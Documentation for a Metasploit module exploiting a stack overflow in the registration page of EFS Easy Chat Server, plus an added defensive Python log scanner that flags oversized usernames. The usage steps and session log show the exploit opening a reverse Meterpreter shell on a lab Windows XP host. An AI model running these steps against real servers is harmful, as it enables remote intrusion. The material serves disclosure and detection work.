Description
This module exploits a vulnerability in the EFS Easy Chat Server application, versions 2 through 3.1. The username parameter of the registration page 'register.php' is prone to a stack overflow vulnerability.
This module allows a remote attacker to execute a payload in the context of the user running the Easy Chat Server application.
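A defender's view of the flaw described above, as an added example that is not part of the module or its documentation: a Python check that flags logged requests to register.php whose username parameter is oversized or carries non-printable bytes. The 64-byte limit, the Combined Log Format input and the parameter being visible in the logged query string are assumptions; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed policy values, not taken from the module or vendor documentation.
MAX_USERNAME_BYTES = 64
TARGET_PAGE = "register.php"
PARAM = "username"

# Client address and request line of a Common/Combined Log Format entry.
REQUEST_RE = re.compile(r'^(\S+) .*?"([A-Z]+) (\S+) HTTP/[\d.]+" (\d{3})')

def inspect_line(line):
    """Return (client, reason, length) for a suspicious request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, _method, target, _status = m.groups()
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/" + TARGET_PAGE):
        return None
    # Decode as latin-1 so every percent-encoded byte maps to one character.
    for key, value in parse_qsl(parts.query, keep_blank_values=True,
                                encoding="latin-1"):
        if key.lower() != PARAM:
            continue
        if len(value) > MAX_USERNAME_BYTES:
            return (client, "oversized username", len(value))
        if any(ord(c) < 0x20 or ord(c) > 0x7e for c in value):
            return (client, "non-printable bytes in username", len(value))
    return None

def scan(lines):
    """Run inspect_line over an iterable of log lines and keep the hits."""
    return [hit for hit in map(inspect_line, lines) if hit]

# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Jun/2017:00:40:01 +0200] "GET /register.php?username=alice&password=x HTTP/1.1" 200 512',
    '192.0.2.66 - - [20/Jun/2017:00:43:50 +0200] "GET /register.php?username=' + "A" * 300 + '&password=x HTTP/1.1" 200 0',
    '192.0.2.67 - - [20/Jun/2017:00:44:10 +0200] "GET /register.php?username=bob%81%fe HTTP/1.1" 200 512',
    '192.0.2.10 - - [20/Jun/2017:00:45:00 +0200] "GET /index.htm?username=' + "B" * 300 + ' HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for client, reason, length in scan(SAMPLE_LOG):
        print(f"{client}: {reason} ({length} bytes)")
```

The same length and character checks can be enforced inline at a reverse proxy or WAF in front of the server, so that oversized values are rejected before they reach the application.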
Vulnerable Application
Easy Chat Server is an easy, fast and affordable way to host and manage real-time communication software.
This module has been tested successfully on:
- Easy Chat Server 3.1 on Windows XP En SP3
Installers:
EFS Easy Chat Server Installers
Verification Steps
- Start msfconsole
- Do: use exploits/windows/http/easychatserver_seh
- Do: set rhosts [IP]
- Do: exploit
- You should get your payload executed
Scenarios
marco@kali:~$ msfconsole -q
msf > use exploit/windows/http/easychatserver_seh
msf exploit(easychatserver_seh) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easychatserver_seh) > exploit
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200
meterpreter > sysinfo
Computer : MM-8B040C5B05D9
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit
msf exploit(easychatserver_seh) >